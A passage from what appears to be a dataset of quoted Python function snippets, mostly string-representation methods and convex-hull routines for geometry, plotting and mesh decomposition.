[mm], hence Pgl is in [dm] ?\r\n\r\n if isinstance(lps, pgl.Translated):\r\n cx, cy, cz = lps.translation\r\n else:\r\n print\"missing Translated from the bounding ellipse as a Translated(Rotated(Scaled(Sphere)))\"\r\n\r\n ori = lps.geometry\r\n\r\n if isinstance(ori, pgl.Oriented):\r\n rotMat = ori.transformation().getMatrix3()\r\n az, el, roll = rotMat.eulerAnglesZYX()\r\n else:\r\n print\"missing Oriented from the bounding ellipse as a Translated(Rotated(Scaled(Sphere)))\"\r\n az = 0\r\n \r\n scal = ori.geometry\r\n\r\n 
if isinstance(scal, pgl.Scaled):\r\n scMat = scal.transformation().getMatrix()\r\n rx, ry, rz, rt = scMat.getDiagonal()\r\n else:\r\n print\"missing Scaled from the bounding ellipse as a Translated(Rotated(Scaled(Sphere)))\"\r\n rx=ry=rz=1\r\n\r\n #x1, y1, z1 #Conversion repère MappleT (m) à reprère Qualitree (q) : Xq=Xm Yq=Zm Zq=-Ym. \r\n #Due to change of coordinate axis, rotation needs - pi <-- apparently not !\r\n #return cx*unit, cz*unit, -cy*unit, rx*unit, rz*unit, ry*unit, az-3.1415927\r\n\r\n return cx*unit, cz*unit, -cy*unit, rx*unit, rz*unit, ry*unit, az", "def algorithmInfo():\n\t\treturn r\"\"\"Fister Jr., Iztok and Fister, Dusan and Yang, Xin-She. \"A Hybrid Bat Algorithm\". Elektrotehniski vestnik, 2013. 1-7.\"\"\"", "def _repr_(self):\n return \"Lie algebra %s over %s\" % (self._classification,\n self.base_ring())", "def __str__(self):\n return \"--> \"+self.__name+ \\\n \" :\\n dimensions : [\"+str(self.xmin)+\",\"+str(self.xmax)+\"]x[\"+ \\\n str(self.ymin)+\",\"+str(self.ymax)+\"]\"+ \\\n \"\\n width : \"+str(self.width)+\" height : \"+str(self.height)+ \\\n \"\\n background image : \"+str(self.__background)+ \\\n \"\\n image of the domain : \"+str(self.__image_filename)+ \\\n \"\\n walls : \"+str(self.__walls)+ \\\n \"\\n doors : \"+str(self.__doors)", "def __str__(self):\n segments = []\n if self.comment:\n segments.append('\"%s\"' % self.comment)\n if self.sg:\n if self.dbow_words:\n segments.append('dbow+w') # also training words\n else:\n segments.append('dbow') # PV-DBOW (skip-gram-style)\n\n else: # PV-DM...\n if self.dm_concat:\n segments.append('dm/c') # ...with concatenative context layer\n else:\n if self.cbow_mean:\n segments.append('dm/m')\n else:\n segments.append('dm/s')\n segments.append('d%d' % self.docvecs.vector_size) # dimensions\n if self.negative:\n segments.append('n%d' % self.negative) # negative samples\n if self.hs:\n segments.append('hs')\n if not self.sg or (self.sg and self.dbow_words):\n segments.append('w%d' % self.window) # window size, when relevant\n if self.vocabulary.min_count > 1:\n segments.append('mc%d' % self.vocabulary.min_count)\n if self.vocabulary.sample > 0:\n segments.append('s%g' % self.vocabulary.sample)\n if self.workers > 1:\n segments.append('t%d' % self.workers)\n return '%s(%s)' % (self.__class__.__name__, ','.join(segments))", "def __repr__(self) -> str:\n argument_dict = {\n \"T_e\": self.T_e,\n \"n_e\": self.n_e,\n \"particle\": self.particle,\n \"Z\": self.Z,\n }\n\n return code_repr.call_string(PlasmaBlob, (), argument_dict)", "def __str__(self) -> str:\n st = \"<solid:\" + str(self.id) + \">\\n{\\n\"\n for s in self.sides:\n st += str(s) + \"\\n\"\n st += \"}\"\n return st", "def plot_hull(self, **kwargs):\n from matador.plotting.hull_plotting import plot_ensemble_hull\n\n return plot_ensemble_hull(\n self, self.data_key, formation_energy_key=self.formation_key, **kwargs\n )", "def __str__(self):\r\n out = \"##\"*(self.width+1)+\"\\n\"\r\n for i in range(self.height):\r\n out += \"#\"\r\n for j in range(self.width):\r\n if self.grid[i][j] == 0:\r\n out += \"##\"\r\n else:\r\n if not self.showSolution:\r\n out += \" \"\r\n elif (i,j) in self.solution:\r\n out += \"**\"\r\n else:\r\n out += \" \"\r\n out += \"#\\n\"\r\n return out + \"##\"*(self.width+1)", "def visualize_pool ( self, pool_id=None ):\n try:\n pool = self._poolstack [ -1 if pool_id is None else pool_id ]\n except IndexError:\n return \"\"\n else:\n return '\\n'.join ( pool.export_rules() )", "def convex_hull(L):\r\n CH=list()\r\n if L != []:\r\n P = 
list(L)\r\n # find the starting point of the algorithm and add it to the convex hull:\r\n ind0 = find_start(P)\r\n CH.append(P.pop(ind0))\r\n # find the next point and add it to the convex hull list CH:\r\n if P != []:\r\n ind1 = next_in_hull(CH[0], np.array([1,0]), P)\r\n CH.append(P.pop(ind1))\r\n # use the hyperplane criterion as function side_points to complete CH:\r\n while P != []:\r\n p = CH[-2]\r\n q = CH[-1]\r\n v = q - p \r\n P = side_points(CH[0], CH[-1] - CH[0], P)\r\n ind = next_in_hull(q, v, P)\r\n if P != []:\r\n CH.append(P.pop(ind))\r\n return CH", "def _repr_(self):\n return \"Category of hyperbolic models of {}\".format(self.base())", "def __str__(self):\n vList = []\n for vertex in self:\n vList.append(vertex.name)\n gStr = \"The DiGraph contains _vertices: {0}\".format(\" \".join(vList))\n return gStr", "def eddy_floyd(points, side=\"\", p_min=[], p_max=[], show=True, save=False, detailed=True):\n# :param points: the points from which to find the convex hull\n# :param side: if \"up\", we care about the points above the line (p_min,p_max), else, below\n# :param p_min: the point on the left of the line (min = min abscissa)\n# :param p_max: the point on the right of the line\n# :param show: if True, the progress in constructing the hull will be plotted on each iteration in a window\n# :param save: if True, the progress in constructing the hull will be saved on each iteration in a .png file\n# :param detailed: if True, even non convex explored polygons are plotted\n if p_min==[] or p_max==[]:\n #Find the point the most on the left (p_min) and the most on the right (p_max)\n p_min,p_max=points[0],points[0]\n for p in points:\n if p[0]<p_min[0]: p_min=p\n if p[0]>p_max[0]: p_max=p\n\n #Divide the points in 2 subproblems (E2=above line, E1=below line)\n #Remark: p_min and p_max are neither in E2 nore in E1 \n E1,E2=[],[]\n for p in points:\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])>0: E2+=[p]\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])<0: E1+=[p]\n #Go to next step and plot results, the element to return is first divided in 2 parts to plot them seperately\n to_be_returned_2=eddy_floyd(E2,side=\"up\",p_min=p_min,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_2)>0:\n scatter_plot(points, [[p_max]+to_be_returned_2+[p_min]], title=\"eddy-floyd search\", show=show, save=save)\n to_be_returned_1=eddy_floyd(E1,side=\"down\",p_min=p_min,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_1)>0:\n scatter_plot(points, [[p_min]+to_be_returned_1+[p_max]], title=\"eddy-floyd search\", show=show, save=save)\n return [p_max]+to_be_returned_2+[p_min]+to_be_returned_1\n\n \"\"\"End algorithm ?\"\"\"\n #Find if points remain outside the line (either above if up or below if done)\n end=True\n i=0\n while end and i<len(points):\n p=points[i]\n if side==\"up\" and (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])>0: end=False \n if side==\"down\" and (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])<0: end=False \n i+=1\n\n \"\"\"Intermidiate case, look for the furthest point and divide the pb in 2 pbs\"\"\"\n if not end:\n p_extr,dist=p_min,0\n E1,E2=[],[]\n if side==\"up\":\n #Find the furthest point from the line (above)\n for p in points:\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])>dist:\n 
p_extr,dist=p,(p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])\n \n #Divide the points which are still outside of the 2 lines in 2 subproblems\n for p in points:\n if (p[1]-p_extr[1])*(p_max[0]-p_extr[0])-(p_max[1]-p_extr[1])*(p[0]-p_extr[0])>0: E2+=[p]\n if (p[1]-p_min[1])*(p_extr[0]-p_min[0])-(p_extr[1]-p_min[1])*(p[0]-p_min[0])>0: E1+=[p]\n\n #Go to next step and plot results, the element to return is first divided in 2 parts to plot them seperately\n to_be_returned_1=eddy_floyd(E1,side=side,p_min=p_min,p_max=p_extr,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_1)>0:\n scatter_plot(points, [[p_extr]+to_be_returned_1+[p_min]], title=\"eddy-floyd search\", show=show, save=save)\n to_be_returned_2=eddy_floyd(E2,side=side,p_min=p_extr,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_2)>0:\n scatter_plot(points, [[p_max]+to_be_returned_2+[p_extr]], title=\"eddy-floyd search\", show=show, save=save)\n to_be_returned=to_be_returned_2+[p_extr]+to_be_returned_1\n if (show or save) and len(to_be_returned)>2:\n scatter_plot(points, [[p_max]+to_be_returned+[p_min]], title=\"eddy-floyd search\", show=show, save=save)\n print\n return to_be_returned \n\n if side==\"down\":\n #Find the furthest point from the line (below) \n for p in points:\n if (p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])<dist:\n p_extr,dist=p,(p[1]-p_min[1])*(p_max[0]-p_min[0])-(p_max[1]-p_min[1])*(p[0]-p_min[0])\n \n #Divide the points which are still outside of the 2 lines in 2 subproblems \n for p in points:\n if (p[1]-p_min[1])*(p_extr[0]-p_min[0])-(p_extr[1]-p_min[1])*(p[0]-p_min[0])<0: E2+=[p]\n if (p[1]-p_extr[1])*(p_max[0]-p_extr[0])-(p_max[1]-p_extr[1])*(p[0]-p_extr[0])<0: E1+=[p]\n\n #Go to next step and plot results, the element to return is first divided in 2 parts to plot them seperately\n to_be_returned_2=eddy_floyd(E2,side=side,p_min=p_min,p_max=p_extr,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_2)>0:\n scatter_plot(points, [[p_min]+to_be_returned_2+[p_extr]], title=\"eddy-floyd search\", show=show, save=save)\n print\n to_be_returned_1=eddy_floyd(E1,side=side,p_min=p_extr,p_max=p_max,show=show,save=save,detailed=detailed)\n if (show or save) and len(to_be_returned_1)>0:\n scatter_plot(points, [[p_extr]+to_be_returned_1+[p_max]], title=\"eddy-floyd search\", show=show, save=save)\n print\n to_be_returned=to_be_returned_2+[p_extr]+to_be_returned_1\n if (show or save) and len(to_be_returned)>2:\n scatter_plot(points, [[p_min]+to_be_returned+[p_max]], title=\"eddy-floyd search\", show=show, save=save)\n print\n return to_be_returned \n \n \"\"\"End case\"\"\"\n if end:\n return []\n\n \"\"\"None of these cases\"\"\"\n print(\"ERREUR\")\n return []", "def __repr__(self) -> str:\n return f\"Graph: |V|= {self.v_size()}, |E|= {self.e_size()}\"", "def convex_hull(self, other):\n hull_vertices = self.vertices() + other.vertices()\n hull_rays = self.rays() + other.rays()\n hull_lines = self.lines() + other.lines()\n hull_field = self.coerce_field(other)\n return Polyhedron(vertices=hull_vertices, \n rays=hull_rays, lines=hull_lines, \n field=hull_field)", "def convexHull(stimulus_class, subject_list, data_dir, save_dir, save_fig=False):\n\t\n\tfig = plt.figure(figsize=(15,9))\n\tax = fig.subplots()\n\tif stimulus_class == 'TIMIT':\n\t\tprint('TIMIT')\n\t\tplt.plot([-0.2, 1.0], [-0.2, 1.0], 'black', label='unity')\n\n\t\t\n\telif stimulus_class == 
'MT':\n\t\tprint('trailers')\n\t\tplt.plot([-0.1, 0.5], [-0.1, 0.5], 'black', label='unity')\n\n\telse:\n\t\tprint('Undefined stimulus class')\n\t# plt.axis('tight')\n\t# plt.axis('square')\n\n\tcorrs = []\n\tcorrs_sig = []\n\t#corrs_nonsig = []\n\tfor idx, s in enumerate(subject_list):\n\t\twith h5py.File('%s/%s/%s_STRF_by_binned_pitches_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as fh: #full model\n\t\t\tfullModel = fh['corrs_%s_norm' %(stimulus_class.lower())][:] \n\t\t\tfullModel[np.isinf(fullModel)]=0\n\t\t\tp_vals_full = fh['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#full_nonsig = (fullModel[np.where(p_vals_full[0] > 0.05)])\n\t\t\tfull_sig = (fullModel[np.where(p_vals_full[0] < 0.05)])\n\n\t\t\t#binned pitch full model \n\t\twith h5py.File('%s/%s/%s_STRF_by_binned_pitch_only_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as fh: #full model\n\t\t\tpitch = fh['corrs_%s_norm' %(stimulus_class.lower())][:] \n\t\t\tpitch[np.isinf(pitch)]=0\n\t\t\tp_val_pitch = fh['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#binned_full_nonsig = (pitch[np.where(p_vals_full[0] > 0.05)])\n\t\t\tbinned_full_sig = (pitch[np.where(p_vals_full[0] < 0.05)])\n\t\t\tprint(pitch)\n\n\t\twith h5py.File('%s/%s/%s_STRF_by_envs_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as h: #envs model only \n\t\t\tenvs = h['corrs_%s_norm' %(stimulus_class.lower())][:]\n\t\t\tenvs[np.isinf(envs)]=0\n\t\t\tp_vals_envs = h['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#envs_nonsig = (envs[np.where(p_vals_full[0] > 0.05)])\n\t\t\tenvs_sig = (envs[np.where(p_vals_full[0] < 0.05)])\n\n\t\twith h5py.File('%s/%s/%s_STRF_by_phnfeat_%s.hf5'%(data_dir, s, s, stimulus_class), 'r') as h: #phnfeat model only \n\t\t\tphnfeat = h['corrs_%s_norm' %(stimulus_class.lower())][:]\n\t\t\tphnfeat[np.isinf(phnfeat)]=0\n\t\t\tp_vals_phnfeat = h['pvals_%s' %(stimulus_class.lower())][:]\n\t\t\t#phnfeat_nonsig = (phnfeat[np.where(p_vals_full[0] > 0.05)])\n\t\t\tphnfeat_sig = (phnfeat[np.where(p_vals_full[0] < 0.05)])\n\n\t\tcorrs.append([fullModel, envs, phnfeat, pitch])\n\t\t#corrs_nonsig.append([full_nonsig, envs_nonsig, phnfeat_nonsig, binned_full_nonsig])\n\t\tcorrs_sig.append([full_sig, envs_sig, phnfeat_sig, binned_full_sig])\n\n\tpoints = np.hstack(corrs).T\n\tpoints_sig = np.hstack(corrs_sig).T\n\t#points_nonsig = np.hstack(corrs_nonsig).T\n\n\thull1=ConvexHull(np.vstack((points_sig[:,0] , points_sig[:,1])).T) #full model, envs\n\thullv1 = hull1.vertices.copy()\n\thullv1 = np.append(hullv1, hullv1[0])\n\tprint(hullv1)\n\n\thull2=ConvexHull(np.vstack((points_sig[:,0] , points_sig[:,2])).T) #full model, phnfeat\n\thullv2 = hull2.vertices.copy()\n\thullv2 = np.append(hullv2, hullv2[0])\n\tprint(hullv2)\n\n\thull3=ConvexHull(np.vstack((points_sig[:,0] , points_sig[:,3])).T) #full model, pitch\n\thullv3 = hull3.vertices.copy()\n\thullv3 = np.append(hullv3, hullv3[0])\n\tprint(hullv3)\n\n\n\t#fill between: \n\tplt.fill(points_sig[hullv2,0], points_sig[hullv2,2], facecolor='#cd1a1e', alpha=0.4, zorder=3, label='full vs. phnfeat') #phnfeat\n\tplt.fill(points_sig[hullv3,0], points_sig[hullv3,3], facecolor='#64a7bc', alpha=0.4, zorder=1, label='full vs. pitch') #pitch \n\tplt.fill(points_sig[hullv1,0], points_sig[hullv1,1], facecolor='#808080', alpha=0.4, zorder=2, label='full vs. envs') #envs\n\n\t# plt.fill(points[hullv4,0], points[hullv4,4], facecolor='#4B8B3B', alpha=0.4, zorder=4, label='full vs. 
binned_pitch')\n\n\n\tplt.plot(points_sig[:,0], points_sig[:,1], '.', color='#808080', alpha=0.8) #envs\n\tplt.plot(points_sig[:,0], points_sig[:,2], '.', color='#cd1a1e', alpha=0.8) #phnfeat\n\tplt.plot(points_sig[:,0], points_sig[:,3], '.', color='#64a7bc',alpha=0.8) #pitch\n\t# plt.plot(points_sig[:,0], points_sig[:,4], '.', color='#4B8B3B', alpha=0.8) #binned pitch \n\n\t# plt.plot(points_nonsig[:,0], points_nonsig[:,1], '.', color='#CDC1C5', alpha=0.7) #envs\n\t# plt.plot(points_nonsig[:,0], points_nonsig[:,2], '.', color='#CDC1C5', alpha=0.7) #phnfeat\n\t# plt.plot(points_nonsig[:,0], points_nonsig[:,3], '.', color='#CDC1C5',alpha=0.7) #pitch\n\t# # plt.plot(points_nonsig[:,0], points_nonsig[:,4], '.', color='#CDC1C5', alpha=0.7) #binned pitch non sig\n\t\n\tplt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n\tplt.xlabel('Full model correlation values (r)')\n\tplt.ylabel('Individual model correlation values (r)')\n\tplt.title('Convex-Hull for %s (Feature distribution across subjects)' %(stimulus_class))\n\tplt.axis('tight')\n\tplt.axis('square')\n\t\n\t#save figure\n\tif save_fig:\n\t\tplt.savefig('%s/%s_ConvexHull.pdf' %(save_dir, stimulus_class))", "def __str__(self):\n value = str(self.puzzle) + str(\" \") + str(self.g) + str(\" \") + str(self.h)\n return value", "def __repr__(self):\n return ''.join(f'\\ncompany: {self.company_name}\\nsize: {self.company_size}\\ncompany_founded: '\n f'{self.company_founded}\\ncompany_industry: {self.company_industry}\\ncompany_sector: '\n f'{self.company_sector}\\ncompany_type: {self.company_type}\\ncompany_rating: '\n f'{self.company_rating}\\ncompany_competitors: {self.company_competitors}\\ncompany_revenue: '\n f'{self.company_revenue}\\ncompany_headquarters: {self.company_headquarters}')", "def __str__(self):\n string = ''\n for degree, coef in enumerate(self.coefs, 1):\n degree = degree - 1\n string += str(coef)+'x^' + str(degree) + ' + '\n string = string[0:-3] # remove the last ' + '\n return string", "def plane_desc(self) -> str:\n return self.planes[0].join(' ') + self.planes[1].join(' ') + self.planes[2].join(' ')", "def teselado(self,points):\n #muestrea todo el espacio de la envolvente para conseguir las fronteras de decision a intervalos regulares \n #get_hull\n area = boundingbox(points)\n #(min_x,min_y),(max_x,min_y),(max_x,max_y),(min_x,max_y)\n #sample inside hull\n lat_sample = np.arange(min_y, max_y, 0.001).tolist()\n lon_sample = np.arange(min_x,max_x, 0.001)\n sampling_space = [[x,y] for x in lat_sample for y in lon_sample]\n sampling_space = np.asarray(sampling_space, dtype=np.float32)\n prediction = kmeans_instance.predict(sampling_space)\n pol = [[list(sampling_space[index]) for index in [i for i, j in enumerate(prediction) if j == k]] for k in range(centers)]\n hull = [shapely.geometry.MultiPoint(pol[i]).convex_hull.exterior._get_coords() for i in range(len(pol))]", "def get_name():\n return \"SVMd+ - simplified approach\"", "def __str__(self):\n return \"Normal:\" + str(self.norm) + \"\\nColour:\" + self.colour", "def description(self) -> str:\n return f\"Maximize number of {colour_name(self.colour)} unit cells \" \\\n f\"that form a blob by touching sides. 
\" \\\n f\"Touching corners doesn't count\"", "def get_string(self):\n this_column_specifier = (\n TABLE_NUMROWS_SEP + \"l\" + TABLE_NUMROWS_SEP + TABLE_NUMROWS_SEP + \n TABLE_NUMROWS_SEP.join([\"c\" for col in xrange(self._num_cols)]) +\n TABLE_NUMROWS_SEP)\n this_column_headers = TABLE_COLSEP.join(\n [\"\"] + [str(top_header_elt) for top_header_elt in self._top_header])\n this_chart_header = CHART_HEADER_TEMPLATE.substitute(\n column_specifier = this_column_specifier,\n caption = self._caption,\n tag = self._tag,\n column_headers = this_column_headers)\n this_chart_content = (TABLE_ROWSEP + os.linesep).join(\n [TABLE_COLSEP.join([str(left_elt)] +\n [str(self._cells[top_elt][left_elt])\n for top_elt in self._top_header])\n for left_elt in self._left_header])\n return os.linesep.join([this_chart_header, this_chart_content,\n CHART_FOOTER])", "def algorithmInfo():\n\t\treturn r\"\"\"TODO\"\"\"", "def __str__(self):\n return_string = self.name + \"\\n\" + str(self.traits)\n\n return return_string", "def descString(self):\n return \"\".join ([self.Name, \" (\", str(self.RollCount), \"d\"\\\n , str(self.RollMax), \"; \", str(self.CritRollMin), \"-\"\\\n , str(self.CritRollMax), \"x\", str (self.CritRollMult)\\\n , \") - \", str(self.Value), \" gp\"])", "def __str__(self):\n\n def onoff(boolean):\n \"\"\"Retorna on/off en funcion del valor booleano\"\"\"\n if boolean:\n return \"on\"\n else:\n return \"off\"\n\n def getPropList():\n s = []\n for prop in self._getPropName():\n s.append(str(prop))\n return \", \".join(s)\n\n def getFunctList():\n s = self.getBindedNames()\n if s == \"\":\n s = \"None\"\n return s\n\n return \"Particle: {15}\\nXYZ position: ({0},{1},{2})\\nAngular velocity: ({3},{4},{5}); ({9},{10},{11})\\nLinear velocity: ({6},{7},{8})); ({12},{13},{14})\\nBinded functions: {16}\\nProperties: {17}\".format(\n round(self.getX(), PARTICLES_ROUND), round(self.getY(), PARTICLES_ROUND),\n round(self.getZ(), PARTICLES_ROUND), round(self.getAngVelX(), PARTICLES_ROUND),\n round(self.getAngVelY(), PARTICLES_ROUND), round(self.getAngVelZ(), PARTICLES_ROUND),\n round(self.getVelX(), PARTICLES_ROUND), round(self.getVelY(), PARTICLES_ROUND),\n round(self.getVelZ(), PARTICLES_ROUND), onoff(self.hasMovementAngX()), onoff(self.hasMovementAngY()),\n onoff(self.hasMovementAngZ()), onoff(self.hasMovementX()), onoff(self.hasMovementY()),\n onoff(self.hasMovementZ()), self.getName(), getFunctList(), getPropList())", "def test_convex_init(self):\n print(\"Convex_Init\")\n finder = dc.dock.ConvexHullPocketFinder()", "def __repr__(self):\n \n s = '#cpt palette generated by gmt_interface.py\\n'\n s += '#COLOR_MODEL = %s\\n' %self.color_model\n s += '#\\n'\n \n for seg in self.segments:\n\n #print x, seg\n xmin = seg.lower_bound\n xmax = seg.upper_bound\n\n rgb_min = seg.rgb_min\n rgb_max = rgb_min + seg.rgb_dif\n \n # Determine number of decimal points\n xmax-xmin\n \n fmin = format_string(xmin) \n fmax = format_string(xmax)\n\n s += fmin %xmin\n s += ' %d %d %d ' %(rgb_min[0], rgb_min[1], rgb_min[2]) \n s += fmax %xmax\n s += ' %d %d %d ' %(rgb_max[0], rgb_max[1], rgb_max[2])\n s += ' %s' %seg.color_segment_boundary\n s += '\\n'\n \n return s", "def __str__(self):\r\n out = (\r\n ' *** Grid dimensions ***\\n'\r\n ' Origin: ( {0.ox:f}, {0.oy:f}, {0.oz:f})\\n'\r\n ' Delta: ( {0.dx:f}, {0.dy:f}, {0.dz:f})\\n'\r\n ' Size: ( {0.lx:f}, {0.ly:f}, {0.lz:f})\\n'\r\n ' N: ( {0.nx:d}, {0.ny:d}, {0.nz:d})\\n'\r\n ' type: {0.gtype}\\n'\r\n ' points: {0.points}\\n'\r\n ' cells: {0.cells}\\n'\r\n ' name: 
{0.gname}\\n'\r\n ).format(self)\r\n\r\n return out", "def __repr__(self) -> str:\n return f\"key:{self.key},pos:{self.pos},inside:{self.get_inside()},outside:{self.get_outside()}\"", "def __repr__(self):\n rep = \"alg_cluster.Cluster(\"\n rep += str(self._fips_codes) + \", \"\n rep += str(self._horiz_center) + \", \"\n rep += str(self._vert_center) + \", \"\n rep += str(self._total_population) + \", \"\n rep += str(self._averaged_risk) + \")\"\n return rep", "def __repr__(self):\n rep = \"alg_cluster.Cluster(\"\n rep += str(self._fips_codes) + \", \"\n rep += str(self._horiz_center) + \", \"\n rep += str(self._vert_center) + \", \"\n rep += str(self._total_population) + \", \"\n rep += str(self._averaged_risk) + \")\"\n return rep", "def __str__(self) -> str:\n\n return f\"Graph: | V |= {self.v_size()}, | E |= {self.e_size()}\"", "def __str__(self):\n header = [\n ' GnoweeHeuristics:']\n header += [('Population = {}').format(self.population)]\n header += [('Sampling Method = {}').format(self.initSampling)]\n header += [('Discovery Fraction = {}').format(self.fracMutation)]\n header += [('Elitism Fraction = {}').format(self.fracElite)]\n header += [('Levy Fraction = {}').format(self.fracLevy)]\n header += [('Levy Alpha = {}').format(self.alpha)]\n header += [('Levy Gamma = {}').format(self.gamma)]\n header += [('Levy Independent Samples = {}').format(self.n)]\n header += [('Levy Scaling Parameter = {}').format(self.scalingFactor)]\n header += [('Constraint Violaition Penalty = {}').format(self.penalty)]\n header += [('Max # of Generations = {}').format(self.maxGens)]\n header += [('Max # of Function Evaluations = {}').format(self.maxFevals)]\n header += [('Convergence Tolerance = {}').format(self.convTol)]\n header += [('Stall Limit = {}').format(self.stallLimit)]\n header += [('Optimal Convergence Tolerance = {}').format(self.optConvTol)]\n header += [' Attributes Inhereted from ProblemParameters:']\n header += [('{}').format(ProblemParameters.__str__(self))]\n return ('\\n').join(header) + '\\n'", "def convex_hull(image):\n\n corners = find_corners(image)\n\n\n vertices = [corners[0]]\n\n for i in range(len(corners)):\n vertices.extend(\n _convex_hull_side(\n image, corners[i], corners[(i + 1) % len(corners)]))\n\n return vertices", "def __str__(self):\n reprStr = 'Help Mario build Iron Man suit!'+'\\n' +'To make the ' + self._name + ',you need:'+'\\n'\n for part in self._supplies:\n reprStr = reprStr + str(part.getCount()) + ' ' + part.getData() + '\\n'\n return reprStr", "def __str__(self):\n return \"f(\" + \",\".join([str(p) for p in self.points]) + \")\"", "def convex_pieces(self, config):\n # get volume\n orig_volume = self.mesh_.get_total_volume()\n \n # convert to off\n meshlabserver_cmd = 'meshlabserver -i \\\"%s\\\" -o \\\"%s\\\"' %(self.obj_filename, self.off_filename) \n os.system(meshlabserver_cmd)\n logging.info('MeshlabServer OFF Conversion Command: %s' %(meshlabserver_cmd))\n\n if not os.path.exists(off_filename):\n logging.warning('Meshlab conversion failed for %s' %(off_filename))\n return\n \n # create convex pieces\n cvx_decomp_command = config['hacd_cmd_template'] %(self.off_filename,\n config['min_num_clusters'],\n config['max_concavity'],\n config['invert_input_faces'],\n config['extra_dist_points'],\n config['add_faces_points'],\n config['connected_components_dist'],\n config['target_num_triangles'])\n logging.info('CV Decomp Command: %s' %(cvx_decomp_command))\n os.system(cvx_decomp_command) \n\n # convert each wrl to an obj and an stl\n convex_piece_files = 
glob.glob('%s_dec_hacd_*.wrl' %(os.path.join(self.file_path_, self.file_root_)))\n convex_piece_meshes = []\n total_volume = 0.0\n\n for convex_piece_file in convex_piece_files:\n file_root, file_ext = os.path.splitext(convex_piece_file)\n obj_filename = file_root + '.obj'\n stl_filename = file_root + '.stl'\n meshlabserver_cmd = 'meshlabserver -i \\\"%s\\\" -o \\\"%s\\\"' %(convex_piece_file, obj_filename) \n os.system(meshlabserver_cmd)\n meshlabserver_cmd = 'meshlabserver -i \\\"%s\\\" -o \\\"%s\\\"' %(convex_piece_file, stl_filename) \n os.system(meshlabserver_cmd)\n\n of = obj_file.ObjFile(obj_filename)\n convex_piece = of.read()\n total_volume += convex_piece.get_total_volume()\n convex_piece_meshes.append(of.read())\n\n root = et.Element('robot', name=\"test\")\n\n # get the masses and moments of inertia\n effective_density = orig_volume / total_volume\n prev_piece_name = None\n for convex_piece, filename in zip(convex_piece_meshes, convex_piece_files):\n convex_piece.set_center_of_mass(np.zeros(3))\n convex_piece.set_density(self.mesh_.density * effective_density)\n \n # write to xml\n piece_name = 'link_%s'%(file_root)\n file_path_wo_ext, file_ext = os.path.splitext(filename)\n file_path, file_root = os.path.split(file_path_wo_ext)\n I = convex_piece.inertia\n link = et.SubElement(root, 'link', name=piece_name)\n\n inertial = et.SubElement(link, 'inertial')\n origin = et.SubElement(inertial, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\")\n mass = et.SubElement(inertial, 'mass', value='%f'%convex_piece.mass)\n inertia = et.SubElement(inertial, 'inertia', ixx='%f'%I[0,0], ixy='%f'%I[0,1], ixz='%f'%I[0,2],\n iyy='%f'%I[1,1], iyz='%f'%I[1,2], izz='%f'%I[2,2])\n \n visual = et.SubElement(link, 'visual')\n origin = et.SubElement(visual, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\")\n geometry = et.SubElement(visual, 'geometry')\n mesh = et.SubElement(geometry, 'mesh', filename=file_path_wo_ext+'.stl')\n material = et.SubElement(visual, 'material', name='')\n color = et.SubElement(material, 'color', rgba=\"0.75 0.75 0.75 1\")\n\n collision = et.SubElement(link, 'collision')\n origin = et.SubElement(collision, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\") \n geometry = et.SubElement(collision, 'geometry')\n mesh = et.SubElement(geometry, 'mesh', filename=file_path_wo_ext+'.stl')\n\n if prev_piece_name is not None:\n joint = et.SubElement(root, 'joint', name='%s_joint'%(piece_name), type='fixed')\n origin = et.SubElement(joint, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\")\n parent = et.SubElement(joint, 'parent', link=prev_piece_name)\n child = et.SubElement(joint, 'child', link=piece_name)\n\n prev_piece_name = piece_name\n\n \"\"\"\n txt_filename = file_root + '.txt'\n f = open(txt_filename, 'w')\n f.write('mass: %f\\n' %(convex_piece.mass))\n f.write('inertia: ' + str(convex_piece.inertia) + '\\n')\n f.close()\n \"\"\"\n\n tree = et.ElementTree(root)\n tree.write('test.URDF')\n exit(0)\n\n return convex_piece_meshes", "def _cell_dimensions_string(self):\n return_str = ''\n return_str += '0.0 {:2.6f} xlo xhi\\n0.0 {:2.6f} ylo yhi\\n0.0 {:2.6f} zlo zhi\\n\\n'.format(*self.cell_lengths)\n return_str += '{:2.5f} {:2.5f} {:2.5f} xy xz yz \\n\\n'.format(*self.tilt_factors)\n \n return return_str", "def _FindHull(s: List[sg.Point2], p: sg.Point2, q: sg.Point2, hull_points: List[sg.Point2]):\n if len(s) == 0:\n return\n seg = sg.Segment2(p, q)\n c = max(s, key=lambda point: sg.squared_distance(seg, point))\n hull_points.insert(hull_points.index(p) + 1, c)\n s.remove(c)\n s1, s2 = split_points_triangle(s, (p, q, c))\n 
